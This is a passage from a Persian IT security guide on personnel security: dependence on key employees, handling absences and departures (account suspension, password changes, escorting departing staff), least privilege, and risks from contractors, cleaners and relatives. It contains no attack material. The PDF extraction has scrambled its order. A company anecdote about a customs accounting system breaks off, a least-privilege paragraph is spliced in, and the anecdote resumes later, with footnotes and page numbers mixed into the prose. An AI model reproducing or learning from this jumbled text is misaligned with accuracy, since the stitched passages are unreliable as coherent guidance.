ﻳﻜﻨﻔﺮ ﻛﺎﺭ ﺧﻄﺮﻧﺎﻛﻲ ﺍﺳﺖ .ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻣﻨﺠﺮ ﺑـﻪ ﺍﻳـﻦ
ﺷﻮﺩ ﻛﻪ ﺁﻥ ﺷـﺨﺺ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺳـﺮﭘﻴﭽﻲ ﻛﻨـﺪ ﻭ
ﻣﺮﺗﻜﺐ ﻛﺎﺭﻫـﺎﻱ ﻣﻤﻨﻮﻋـﻪ ﺷـﻮﺩ؛ ﻭ ﺍﻳـﻦ ﺩﺭﺣـﺎﻟﻲ ﺍﺳـﺖ ﻛـﻪ
ﻫﻴﭽﻜﺲ ﺟﺰ ﺧﻮﺩ ﺍﻭ ﮔﺰﺍﺭﺷﺎﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻳﻦ ﻛﺎﺭﻫـﺎ ﺭﺍ
ﻧﻤﻲﺧﻮﺍﻧﺪ ﻭ ﻟﺬﺍ ﻧﺎﻓﺮﻣﺎﻧﻲ ﻭﻱ ﺑﺼﻮﺭﺕ ﻣﺨﻔﻲ ﺑﺎﻗﻲ ﻣـﻲﻣﺎﻧـﺪ ﻭ
ﺑﻪ ﺍﺣﺘﻤﺎﻝ ﺯﻳﺎﺩ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﺑﺎﺯ ﻫﻢ ﺗﻜﺮﺍﺭ ﻣﻲﺷﻮﺩ.
ﻭﺍﺑﺴﺘﮕﻲ ﺑﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻛﻠﻴﺪﻱ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ
ﻫﻴﭽﻜﺲ ﺩﺭ ﻳـﻚ ﺳـﺎﺯﻣﺎﻥ ﻧﺒﺎﻳـﺪ ﻏﻴﺮﻗﺎﺑـﻞ ﺟـﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷـﺪ
ﭼﺮﺍﻛﻪ ﻫﻴﭻ ﺍﻧﺴﺎﻧﻲ ﺟﺎﻭﺩﺍﻧﻪ ﻭ ﻫﻤﻴﺸﮕﻲ ﻧﻴﺴﺖ .ﺍﮔﺮ ﺑﻘﺎﻱ ﻳـﻚ
ﺳﺎﺯﻣﺎﻥ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﻋﻤﻠﻜﺮﺩ ﺭﻭﺯﺍﻧﺔ ﻳﻚ ﻛﺎﺭﻣﻨـﺪ ﻛﻠﻴـﺪﻱ ﺑﺎﺷـﺪ،
ﺑﺪﻭﻥ ﺷﻚ ﺁﻥ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﻣﺨﺎﻃﺮﻩ ﻣﻮﺍﺟﻪ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ
ﺍﻣﻨﻴﺖ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﻣـﻮﺍﻗﻌﻲ ﭼـﻮﻥ ﺑﻴﻤـﺎﺭﻱ ﻳـﺎ ﺍﺧـﺮﺍﺝ
ﻧﺎﮔﻬﺎﻧﻲ ﺍﻓﺮﺍﺩ ﻛﻠﻴـﺪﻱ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻃﺮﺣﻬـﺎﻱ ﻣﻜﺘـﻮﺑﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷﻨﺪ ﻭ ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ ﺍﺯ ﺁﻥ ﻃﺮﺣﻬﺎ ﺑﻬﺮﻩ ﮔﻴﺮﻧﺪ.
ﺩﺭ ﻳﻚ ﻣﻮﺭﺩ ﻛﻪ ﮔﺰﺍﺭﺵ ﺁﻥ ﺑﺪﺳﺖ ﻣﺎ ﺭﺳﻴﺪﻩ ،ﻳﻚ ﺷﺮﻛﺖ ﺑـﺎ
ﺣﺪﻭﺩ ۱۰۰ﻛﺎﺭﻣﻨـﺪ ﺑـﻴﺶ ﺍﺯ ۱۰ﺳـﺎﻝ ﻭﻗـﺖ ﺻـﺮﻑ ﺗـﺪﻭﻳﻦ
ﺲ ﺍﻭ ﻳـﻚ ﺭﻭﺯ ﺩﺭ ﺭﺍﻩ ﺩﭼـﺎﺭ ﻳـﻚ
ﺍﮔﺮ ﻣﺪﻳﺮ MISﻭ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ
ﺗﺼﺎﺩﻑ ﻣﺮﮔﺒﺎﺭ ﻣﻲﺷﺪﻧﺪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﻣـﻲﺍﻓﺘـﺎﺩ؟ ﺍﮔـﺮ ﺑـﻪ ﻣـﺪﻳﺮ
MISﺷﻐﻠﻲ ﻣﻨﺎﺳﺒﺘﺮ ﺑﺎ ﺣﻘﻮﻕ ﭼﻨﺪﺑﺮﺍﺑﺮ ﭘﻴﺸﻨﻬﺎﺩ ﻣـﻲﺷـﺪ ﭼـﻪ
ﺍﺗﻔﺎﻗﻲ ﺭﺥ ﻣﻲﺩﺍﺩ؟ ﺍﮔﺮ ﺑﺮﻧﺎﻣﻪﻧـﻮﻳﺲ ﺑﺨـﺎﻃﺮ ﻧﻴـﺎﺯ ﺷـﺮﻛﺖ ﺑـﻪ
ﻧﮕﻬﺪﺍﺭﻱ ﺍﻭ ﺩﺭ ﭘﺴﺖ ﺧﻮﺩ ﻧﻤﻲﺗﻮﺍﻧﺴﺖ ﺍﺭﺗﻘﺎﻱ ﺳـﺎﺯﻣﺎﻧﻲ ﭘﻴـﺪﺍ
ﻛﻨﺪ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﻛﺎﺭ ﺩﺭ ﺳـﺎﺯﻣﺎﻥ ﺩﻟـﺴﺮﺩ ﻭ ﻋـﺼﺒﺎﻧﻲ ﻣـﻲﺷـﺪ
ﭼﻄﻮﺭ؟
ﺍﻳﻨﻜﻪ ﭘﺮﺳﻨﻞ ﺍﺻﻠﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺷﻮﻧﺪ ﻳﻜﻲ ﺍﺯ ﻣﻌﺎﻳﺐ ﻭ
ﻫﺰﻳﻨﻪﻫﺎﻱ ﺟﺪﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷـﻮﺩ -ﻭ
ﻣﺪﻳﺮﻳﺖ ﺍﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻨﺪﺭﺕ ﺑﻪ ﺍﻳﻦ ﻫﺰﻳﻨـﻪ ﻫـﺎ ﺗﻮﺟـﻪ ﻛـﺎﻓﻲ
ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﻳﻜـﻲ ﺩﻳﮕـﺮ ﺍﺯ ﺩﻻﻳـﻞ ﺑﻜـﺎﺭﮔﻴﺮﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺣﺎﺿﺮ ﻭ ﺁﻣﺎﺩﻩ ﻭ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎﻱ
ﻧﻮﺷﺘﺎﺭﻱ -ﺑﻄﻮﺭﻳﻜﻪ ﻳﻚ ﻓﺮﺩ ﺗﺎﺯﻩﻭﺍﺭﺩ ﺑﺘﻮﺍﻧﺪ ﺑﺮﺍﺣﺘﻲ ﺟﺎﻳﮕﺰﻳﻦ
ﻧﻔﺮ ﻗﺒﻠﻲ ﺷﻮﺩ -ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﺪ.
ﻏﻴﺒﺖ ﻭ ﺗﺮﻙ ﺷﻐﻞ
ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺑﺎ ﻣﻴﻞ ﻭ ﺍﺭﺍﺩﺓ ﺷﺨﺼﻲ ﺧﻮﺩ )ﻣﺜﻞ ﭘﻴﺸﻨﻬﺎﺩﻫﺎﻱ
ﺑﻬﺘﺮ ﺷﻐﻠﻲ( ﻭ ﮔﺎﻫﻲ ﺑﺼﻮﺭﺕ ﻏﻴﺮﺩﺍﻭﻃﻠﺒﺎﻧـﻪ )ﻣﺜـﻞ ﻭﻗـﻮﻉ ﻣـﺮﮒ ﻳـﺎ
ﺁﺳﻴﺒﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ( ﻳﻚ ﻛﺎﺭ ﺭﺍ ﺗﺮﻙ ﻣﻲﻛﻨﻨﺪ .ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮ
ﺯﻣﺎﻧﻲ ﻧﻴﺰ ﺑﻪ ﻫﺮ ﺣﺎﻝ ﺍﻓﺮﺍﺩ ﺑﻪ ﻣﺴﺎﻓﺮﺕ ﻣﻲﺭﻭﻧﺪ ﻭ ﻳـﺎ ﺑـﺪﻻﻳﻞ
ﺧﺎﻧﻮﺍﺩﮔﻲ ﻭ ﺷﺨﺼﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﻱ ﭼﻨﺪ ﺭﻭﺯ ﺍﺯ ﺍﺩﺍﺭﻩ ﻏﻴﺒﺖ
ﻛﻨﻨﺪ .ﺩﺭ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﺑﺎﻳـﺪ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺕ ﻭ
ﺭﻭﺍﻟﻬﺎ ﺑﺮﺍﻱ ﮔﺮﺩﺵ ﻛﺎﺭ ﺩﺭ ﺷﺮﺍﻳﻂ ﻏﻴﺒﺖ ﻳﺎ ﺗﺮﻙ ﺷﻐﻞ ﺗﻌﺮﻳـﻒ
ﺷﺪﻩ ﺑﺎﺷﺪ .ﺍﻳﻦ ﻣﺠﻤﻮﻋﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺮﺍﺣﻠﻲ ﭼـﻮﻥ ﺗﻌﻠﻴـﻖ
ﺣﺴﺎﺑﻬﺎ )ﺍﻟﺒﺘﻪ ﻧـﻪ ﺩﺭ ﻣـﻮﺭﺩ ﻏﻴﺒـﺖ( ،ﺗﺨـﺼﻴﺺ ﻛﺎﺭﻫـﺎﻱ ﻓـﺮﺩ ﺑـﻪ
ﻛﺎﺭﻛﻨــﺎﻥ ﺩﻳﮕــﺮ ،ﺗﻐﻴﻴــﺮ ﺭﻣــﺰﻫــﺎﻱ ﻋﺒــﻮﺭ ﺣــﺴﺎﺱ ،ﺑﺮﺭﺳــﻲ
Management Information Systems
98
ﺑﺨﺶ ﺳﻮﻡ
ﺍﻳﻦ ﺍﺻﻞ ﻣﻲﮔﻮﻳﺪ ﻛﻤﺘﺮﻳﻦ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﺭﺍ
ﻲ ﻣﺤﺪﻭﺩﺷـﺪﻩ ،ﻫـﻢ ﺷـﺎﻣﻞ
ﺑﻪ ﻫﺮ ﻓـﺮﺩ ﺑﺪﻫﻴـﺪ .ﺍﻳـﻦ ﺩﺳﺘﺮﺳـ ﹺ
ﺩﺳﺘﺮﺳﻲ ﻣﻨﻄﻘﻲ ﺍﺳﺖ )ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ،ﺷـﺒﻜﻪﻫـﺎ،
ﺑﺮﻧﺎﻣﻪﻫﺎ( ﻭ ﻫﻢ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ )ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ،ﻧﻮﺍﺭﻫـﺎﻱ
ﭘــﺸﺘﻴﺒﺎﻥ ﻭ ﺳــﺎﻳﺮ ﺗﺠﻬﻴ ـﺰﺍﺕ ﺟــﺎﻧﺒﻲ( .ﺍﮔــﺮ ﻫ ـﺮ ﻛــﺎﺭﺑﺮ ﺭﻭﻱ ﻫﻤــﺔ
ﺳﻴﺴﺘﻤﻬﺎ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻣﻨﺎﺑﻊ ﺩﺳﺘﺮﺳـﻲ ﻓﻴﺰﻳﻜـﻲ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ،ﺁﻧﮕﺎﻩ ﺗﻤﺎﻡ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ﻧﻈـﺮ ﻣﻴـﺰﺍﻥ ﺗﻬﺪﻳـﺪ ﺗﻘﺮﻳﺒـﹰﺎ
ﻳﻜﺴﺎﻥ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﺳﻴﺴﺘﻢ ﺣﺴﺎﺑﺪﺍﺭﻱ ﮔﻤﺮﻛﻲ ﺧﻮﺩ ﻭ ﻭﺍﺭﺩﺍﺕ ﺳﻔﺎﺭﺷﺎﺕ ﻧﻤﻮﺩ .ﺍﻳﻦ
ﺳﻴﺴﺘﻢ ﺑﺎ ﻳﻚ ﺯﺑﺎﻥ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻛﻪ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ
ﻧﺒﻮﺩ ﺗﻬﻴﻪ ﺷﺪ ﻭ ﺷﺮﻛﺘﻲ ﻛﻪ ﺁﻧﺮﺍ ﺗﻬﻴﻪ ﻛﺮﺩﻩ ﺑﻮﺩ ﭘـﺲ ﺍﺯ ﻣـﺪﺕ
ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭ ﺗﺠﺎﺭﺕ ﺭﺍ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺖ .ﺩﺭ ﺁﻥ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﺩﻭ ﻧﻔﺮ
ﺑﻪ ﻧﺤـﻮﺓ ﻛـﺎﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﺁﺷـﻨﺎ ﺑﻮﺩﻧـﺪ :ﻣـﺪﻳﺮ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺲ ﺍﻭ .ﺍﻳـﻦ ﺩﻭ ﻧﻔـﺮ
ﺍﻃﻼﻋﺎﺕ ﻣﺪﻳﺮﻳﺖ ) ٩٨(MISﻭ ﻧﻴﺰ ﺑﺮﻧﺎﻣﻪﻧﻮﻳ ﹺ
ﻣﺴﺌﻮﻝ ﺍﻳﺠﺎﺩ ﺗﻐﻴﻴـﺮﺍﺕ ﺩﺭ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺳﻴـﺴﺘﻢ ﺣـﺴﺎﺑﺪﺍﺭﻱ،
ﺁﻣﺎﺩﻩﺳﺎﺯﻱ ﮔﺰﺍﺭﺷـﺎﺕ ﺳـﺎﻻﻧﻪ ،ﺗﻌﻤﻴـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﺍﺯﻛﺎﺭﺍﻓﺘـﺎﺩﺓ
ﺭﺍﻳﺎﻧﻪ ،ﻭ ﺣﺘﻲ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ )ﻛـﻪ ﺧـﺎﺭﺝ ﺍﺯ ﻣﺤﻮﻃـﺔ
ﺍﺩﺍﺭﻱ ﺷﺮﻛﺖ ﻭ ﺩﺭ ﺩﻓﺘﺮ ﻣﺪﻳﺮ MISﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ( ﺑﻮﺩﻧﺪ.
١٦٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺻﻨﺪﻭﻗﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ؛ ﻭ ﻳﺎ ﻗﻄﻊ ﺩﺳﺘﺮﺳـﻴﻬﺎ ﺑـﻪ ﺗﻤـﺎﻡ ﺍﻳـﻦ
ﺳﻴﺴﺘﻤﻬﺎ ﺑﺎﺷﺪ.
ﺩﺭ ﺑﺮﺧﻲ ﻣﺤﻴﻄﻬﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻧﺠـﺎﻡ ﺍﻳـﻦ ﻛﺎﺭﻫـﺎ ﺗـﺄﺛﻴﺮﺍﺕ
ﻼ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺩﺭ ﻳـﻚ ﺩﺍﻧـﺸﮕﺎﻩ،
ﮔﺴﺘﺮﺩﻩﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻣﺜ ﹰ
ﺩﺍﻧﺸﺠﻮﻳﺎﻥ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻞ ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﺗﺎ ﻣﺎﻫﻬﺎ ﻳﺎ ﺳﺎﻟﻬﺎ
ﻼ
ﺑﻌﺪ ﺍﺯ ﻓﺎﺭﻍﺍﻟﺘﺤﺼﻴﻠﻲ ﻫﻤﭽﻨﺎﻥ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ )ﻣـﺜ ﹰ
ﺑﺮﺍﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺍﺳـﺎﺗﻴﺪ( ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ .ﺩﺭ ﺍﺩﺍﺭﺍﺕ ﻧﻴـﺰ ﺍﮔـﺮ ﻳﻜـﻲ ﺍﺯ
ﻛﺎﺭﻣﻨﺪﺍﻥ ﺩﺭ ﺳﻔﺮ ﺑﺎﺷﺪ ﻳﺎ ﺑﻪ ﺧﺎﻃﺮ ﺑﻴﻤﺎﺭﻱ ﻏﻴﺒﺖ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ
)ﺍﻟﺒﺘﻪ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﺭﻭﺯ( ،ﺣـﺴﺎﺑﻬﺎﻱ ﺍﻭ ﻧﺒﺎﻳـﺪ ﻣـﺴﺪﻭﺩ ﻭ ﺭﻣﺰﻫـﺎﻱ
ﻋﺒﻮﺭﺵ ﻧﺒﺎﻳﺪ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ.
ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﻣﻮﺍﻗﻊ ﺗـﺮﻙ ﺷـﻐﻞ ﺑـﺴﻴﺎﺭ ﻧﺎﮔﻬـﺎﻧﻲ ﻭ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ
ﺍﺳــﺖ .ﺩﺭ ﺍﻳــﻦ ﺷــﺮﺍﻳﻂ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﻓــﺮﺩﻱ ﺩﺭ ﻣﺤــﻞ ﻛــﺎ ﹺﺭ
ﻛﺎﺭﻣﻨﺪﻱ ﻛﻪ ﺗﺮﻙ ﺷﻐﻞ ﻛﺮﺩﻩ ﺣﺎﺿﺮ ﺷﻮﺩ ﺗﺎ ﺍﺯ ﺗﻌﻮﻳﺾ ﻗﻔﻠﻬـﺎ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﺪ ﻭ ﻳﻚ ﻣﺄﻣﻮﺭ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺟﻌﺒﻪﺍﻱ ﺣﺎﻭﻱ
ﻭﺳﺎﻳﻞ ﺷﺨﺼﻲ ﻭﻱ ﻛﻪ ﺩﺍﺧﻞ ﻛﺸﻮﻱ ﻣﻴﺰ ﻛﺎﺭﺵ ﺑﻮﺩﻩﺍﻧـﺪ ﺑـﻪ
ﻼ ﺣـﺬﻑ ﺷـﺪﻩ ،ﺗﻤـﺎﻣﻲ
ﺑﺪﺭﻗﺔ ﺍﻭ ﺑﺮﻭﺩ .ﺣﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ ﺍﻭ ﻗـﺒ ﹰ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﻴﺴﺘﻢ ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ ،ﻭ ﺗﻠﻔﻨﻬﺎﻱ ﺩﻓﺘﺮ ﻭﻱ ﻧﻴـﺰ
ﺩﻳﮕﺮ ﻭﺻﻞ ﻧﻴﺴﺘﻨﺪ .ﺍﻳﻦ ﺷﻜﻞ ﻣـﺪﻳﺮﻳﺖ ﺟـﺪﺍﺋﻲ ٩٩ﺩﺭ ﺻـﻨﺎﻳﻊ
ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ﺑﺴﻴﺎﺭ ﻣﻌﻤﻮﻝ ﺍﺳﺖ ﻭ ﺑﺨﺸﻲ ﺍﺯ ﻣﺸﺎﻏﻞ ﺳـﺎﺯﻣﺎﻥ
ﻻ ﻛﺎﺭﻣﻨـﺪﺍﻧﻲ ﻫـﺴﺘﻨﺪ
ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﺩ .ﻛﺎﺭﻛﻨﺎﻥ ﺍﻳﻦ ﺑﺨﺶ ﻣﻌﻤﻮ ﹰ
ﻛﻪ ﺍﺯ ﺭﻭﻱ ﻣﻴﻞ ﺧﻮﺩﺷﺎﻥ ﻭ ﺑﺮ ﺣـﺴﺐ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻳﻲ ﺍﺳـﺘﺨﺪﺍﻡ
ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺫﻛﺮ ﺷﺪﻩ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻣـﺴﺌﻮﻝ ﺍﻧﺠـﺎﻡ
ﭼﻨﻴﻦ ﺍﻗﺪﺍﻣﺎﺗﻲ ﺷﻮﻧﺪ .ﺗﺤﺖ ﻫﺮ ﺷﺮﺍﻳﻄﻲ ﺍﺯ ﺩﺍﻧﺶ ﻋﺮﻓﻲ ﺧـﻮﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﺩﻗﻴﻘﹰﺎ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﻛﻪ ﺳﻴﺎﺳﺖ ﺩﺳﺘﺮﺳﻲ
ﺑﺎﻳﺪ ﭼﻪ ﺑﺎﺷﺪ ﻭ ﺁﻧﺮﺍ ﺑﻮﺿﻮﺡ ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﺍﻓﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺩﺭ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺁﻥ ﺳﻴﺎﺳﺘﻬﺎ ﺑﻴﺎﻥ ﻛﻨﻴﺪ.
ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺳﺎﻳﺮ ﻛﺎﺭﻛﻨﺎﻥ
ﺍﻓﺮﺍﺩ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﻫﻤﻮﺍﺭﻩ ﻣﻨﺎﻓﻊ ﻭ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺩﺭﻧﻈﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ﻳـﺎ ﺑـﻪ
ﺧﺴﺎﺭﺗﻬﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﻭﺍﺭﺩ ﺷﻮﺩ ﺑﻲﺗﻮﺟﻬﻲ ﻧﺸﺎﻥ
ﺩﻫﻨﺪ .ﮔﺰﺍﺭﺷـﺎﺕ ﺯﻳـﺎﺩﻱ ﺩﺭ ﻣـﻮﺭﺩ ﻭﻗـﻮﻉ ﭼﻨـﻴﻦ ﺍﺗﻔﺎﻗـﺎﺗﻲ ﺩﺭ
ﻣﺤﻴﻄﻬﺎﻱ ﺧـﺎﻧﻮﺍﺩﮔﻲ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﻫﻤﺒﺎﺯﻳﻬـﺎﻱ ﻛﻮﺩﻛـﺎﻥ ﻛـﻪ
ﻭﻳﺮﻭﺳﻬﺎﻳﻲ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛـﺮﺩﻩﺍﻧـﺪ ﻭ ﻳـﺎ ﺍﻓـﺮﺍﺩ
ﻣﺘﺄﻫﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺟﻤﻊﺁﻭﺭﻱ ﻣﺪﺍﺭﻙ ﻭ ﺁﮔـﺎﻩ ﺷـﺪﻥ ﺍﺯ ﺧﻴﺎﻧـﺖ
Separation Management
99
ﻫﻤﺴﺮﺍﺷﺎﻥ ﺩﺭ ﭘﻴﻮﻧﺪ ﺯﻧﺎﺷﻮﻳﻲ ،ﺩﻳﺴﻜﻬﺎ ﺭﺍ ﻣـﻮﺭﺩ ﻭﺍﺭﺳـﻲ ﻗـﺮﺍﺭ
ﺩﺍﺩﻩﺍﻧــﺪ .ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻱ ﺗﺠــﺎﺭﻱ ﻧﻴــﺰ ﮔﺰﺍﺭﺷــﺎﺗﻲ ﺩﺭ ﻣــﻮﺭﺩ
ﻧﻈﺎﻓﺘﭽﻲﻫﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻣﻮﻗﺖ ﺩﻓﺘـﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺣـﻴﻦ
ﺧﺮﺍﺑﻜﺎﺭﻱ ﻳﺎ ﺟﺎﺳﻮﺳﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺮﻛﺖ ﺩﺳﺘﮕﻴﺮ ﺷﺪﻩﺍﻧﺪ.
ﺷﻤﺎ ﻧﻤﻲﺗﻮﺍﻧﻴﺪ ﭘﺪﺭ ﻭ ﻣﺎﺩﺭ ﺧﻮﺩ ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ
ﺗﻌﻴﻴﻦ ﺍﻳﻨﻜﻪ ﭼﻪ ﻛﺴﻲ ﺣﻖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷـﺮﻛﺖ
ﺷﻤﺎ ﺩﺍﺭﺩ ﺗﺄﺛﻴﺮﮔﺬﺍﺭ ﺑﺎﺷـﻴﺪ .ﺑﺎﺯﺩﻳﺪﻛﻨﻨـﺪﮔﺎﻥ ،ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ
ﺗﻌﻤﻴﺮﺍﺕ ،ﭘﻴﻤﺎﻧﻜﺎﺭﺍﻥ ،ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ،ﻭ ﺳﺎﻳﺮ ﺍﻓﺮﺍﺩ ﻫﻤﮕﻲ ﻣﻤﻜﻦ
ﺍﺳﺖ ﺑﻪ ﺩﻓﺘﺮ ﻛﺎﺭ ﻭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺩﺳﺘﺮﺳﻲ ﻣﻮﻗﺘﻲ ﻳﺎ ﻧﻴﻤﻪﺩﺍﺋﻤﻲ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﺑﺒﻴﻨﻴﺪ ﻫﻤﺔ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺗﺎﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗـﺮﺍﺭ
ﺩﺍﺩﻩﺍﻳﻢ ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ ﺻـﺪﻕ ﻛﻨﻨـﺪ .ﺩﺭ
ﭘﺎﻳــﺎﻥ ﺍﺯ ﻳــﺎﺩ ﻧﺒﺮﻳــﺪ ﻛــﻪ ﻫــﻴﭽﻜﺲ ﺍﺯ ﺑﻴــﺮﻭﻥ ﺍﺩﺍﺭﻩ ﻧﺒﺎﻳــﺪ ﺑــﻪ
ﻲ ﻧﺎﻣﺤﺪﻭﺩ
